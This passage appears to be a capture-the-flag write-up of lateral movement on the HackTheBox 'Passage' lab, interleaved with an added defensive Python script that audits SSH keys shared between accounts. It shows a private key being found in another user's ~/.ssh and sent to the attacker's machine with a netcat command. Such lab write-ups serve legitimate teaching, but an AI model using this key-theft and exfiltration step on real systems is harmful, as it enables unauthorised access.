SSH_Key
After making a lateral movement to the paul user from the existing session, I was trying to upgrade the shell to an SSH session by writing my own key to the SSH file of the paul user. Then I discovered something interesting
paul@passage:~/.ssh$ ll
total 24
drwxr-xr-x 2 paul paul 4096 Jul 21 2020 ./
drwxr-x--- 16 paul paul 4096 Feb 5 2021 ../
-rw-r--r-- 1 paul paul 395 Jul 21 2020 authorized_keys
-rw------- 1 paul paul 1679 Jul 21 2020 id_rsa
-rw-r--r-- 1 paul paul 395 Jul 21 2020 id_rsa.pub
-rw-r--r-- 1 paul paul 1312 Jul 21 2020 known_hosts
There already are existing SSH keys sitting here
paul@passage:~/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passage
Checking the authorized_keys file reveals that the SSH key pair belongs to the nadav user.
While I am unsure if this was a misconfiguration or intentional for quicker management, I can probably use this key to make another lateral movement to the nadav user
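An added example, not part of the original write-up: a defender-side audit in Python that flags the condition seen here, a key pair stored in one account's ~/.ssh that another account's authorized_keys accepts. The function names, the `homes` mapping, and the constructed demo layout (including the assumption that the key is listed in nadav's authorized_keys) are illustrative.

```python
import tempfile
from pathlib import Path

KEY_TYPES = ("ssh-", "ecdsa-", "sk-")  # prefixes of OpenSSH public key types

def key_blobs(path):
    """Yield (base64_blob, comment) for each public key line in a file."""
    if not path.is_file():
        return
    for line in path.read_text(errors="replace").splitlines():
        if line.lstrip().startswith("#"):
            continue  # commented-out entry
        fields = line.split()
        # authorized_keys lines may begin with options, so locate the key type
        for i, field in enumerate(fields[:-1]):
            if field.startswith(KEY_TYPES):
                yield fields[i + 1], " ".join(fields[i + 2:])
                break

def find_shared_keys(homes):
    """homes maps user -> home Path. Returns (holder, target, comment) tuples:
    a key pair stored in holder's ~/.ssh is authorized to log in as target."""
    held = {}  # blob -> users whose ~/.ssh holds the pair (X.pub beside X)
    for user, home in homes.items():
        for pub in (home / ".ssh").glob("*.pub"):
            if pub.with_suffix("").is_file():
                for blob, _ in key_blobs(pub):
                    held.setdefault(blob, set()).add(user)
    return [(holder, user, comment)
            for user, home in homes.items()
            for blob, comment in key_blobs(home / ".ssh" / "authorized_keys")
            for holder in sorted(held.get(blob, ())) if holder != user]

def demo():
    """Constructed layout: paul's ~/.ssh holds a pair that nadav authorizes."""
    pub = "ssh-rsa AAAAQ09OU1RSVUNURUQ= nadav@passage\n"  # constructed, not a real key
    with tempfile.TemporaryDirectory() as tmp:
        homes = {u: Path(tmp) / u for u in ("paul", "nadav")}
        for home in homes.values():
            (home / ".ssh").mkdir(parents=True)
        ssh = homes["paul"] / ".ssh"
        (ssh / "id_rsa").write_text("constructed placeholder\n")
        (ssh / "id_rsa.pub").write_text(pub)
        (ssh / "authorized_keys").write_text(pub)
        (homes["nadav"] / ".ssh" / "authorized_keys").write_text("no-pty " + pub)
        return find_shared_keys(homes)

if __name__ == "__main__":
    print(demo())
```

Each finding names the account holding the private key, the account it can log in as, and the key comment, which is the same `nadav@passage` hint visible in the listing above.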
paul@passage:~/.ssh$ nc 10.10.14.4 2222 < id_rsa
┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ nnc 2222 > id_rsa.nadav
listening on [any] 2222 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.206] 54874
┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ chmod 600 id_rsa.nadav
I transferred the private SSH key that belongs to the nadav user using Netcat.
I also set its permission bits to 600, so that SSH can read this file as a valid SSH private key.
Now, I will test it out